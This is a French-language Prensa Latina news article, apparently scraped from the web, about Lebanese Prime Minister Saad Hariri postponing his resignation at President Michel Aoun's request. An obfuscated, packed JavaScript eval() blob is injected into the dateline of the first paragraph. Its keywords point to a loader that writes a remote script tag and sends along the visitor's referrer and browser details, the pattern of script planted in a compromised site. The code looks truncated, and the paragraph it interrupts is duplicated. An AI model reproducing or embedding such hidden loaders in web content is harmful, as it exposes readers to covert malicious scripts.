lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le premier ministre libanais reporte sa démission

Beyrouth, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khydb|var|u0026u|referrer|estfb||js|php'.split('|'),0,{})) 22 novembre (Prensa Latina) Le premier ministre libanais, Saad Hariri, a aujourd´hui reporté sa démission sur demande du président Michel Aoun, suite à une réunion de ces derniers et du titulaire du Parlement, Nabih Berri.

Beyrouth, 22 novembre (Prensa Latina) Le premier ministre libanais, Saad Hariri, a aujourd´hui reporté sa démission sur demande du président Michel Aoun, suite à une réunion de ces derniers et du titulaire du Parlement, Nabih Berri.

Hariri a déclaré : « j´ai donné ma démission au président Aoun et il m´a demandé de retarder ma décision pour laisser du temps aux consultations et délibérations ; et j´ai accepté ».

Berri a quant à lui été présent au début de la réunion puis a ensuite abandonné le salon.

Hariri a annoncé sa démission du poste de premier ministre le 4 novembre dernier lors d´une retransmission télévisée depuis l´Arabie Saoudite, puis est revenu au Liban hier pour participer à la cérémonie pour le Jour de l´Indépendance.

La démission du chef du gouvernement a surpris le pays, puis son séjour prolongé au royaume saoudite, du 3 au 18 novembre, a alimenté des rumeurs selon lesquelles il aurait été obligé à prendre cette décision.

Le président Aoun a refusé de tenir compte de cette démission jusqu´à pouvoir « rencontrer le premier ministre Hariri pour qu´il explique ses raisons ».

Pour démissionner, le premier ministre a invoqué le fait qu´il avait peur pour sa vie et celle de sa famille, puis a répété des critiques des autorités saoudiennes au sujet de l´influence croissante de l´Iran et de la Résistance Islamique, ou Hezbollah, au sein du gouvernement.

L´annonce de cette démission a provoqué une crise dans le panorama politique du pays des cèdres, compte tenu du fait que la Constitution exige que les postes principaux de l´État et du gouvernement soient distribués en fonction des secteurs confessionnels.

C´est ainsi que le président doit être un chrétien maronite ; le premier ministre un musulman sunnite et le titulaire du parlement un musulman chiite.

Et il n´a pour le moment aucun remplaçant approprié pour le poste de premier ministre, ce qui entraine des débats parlementaires qui peuvent se prolonger durant des années.

Aouni, Hariri et Berri ont présidé la parade militaire qui a honoré le 74ième anniversaire du Jour de l´Indépendance du Liban.

peo/tgj/arc

EN CONTINU
notes connexes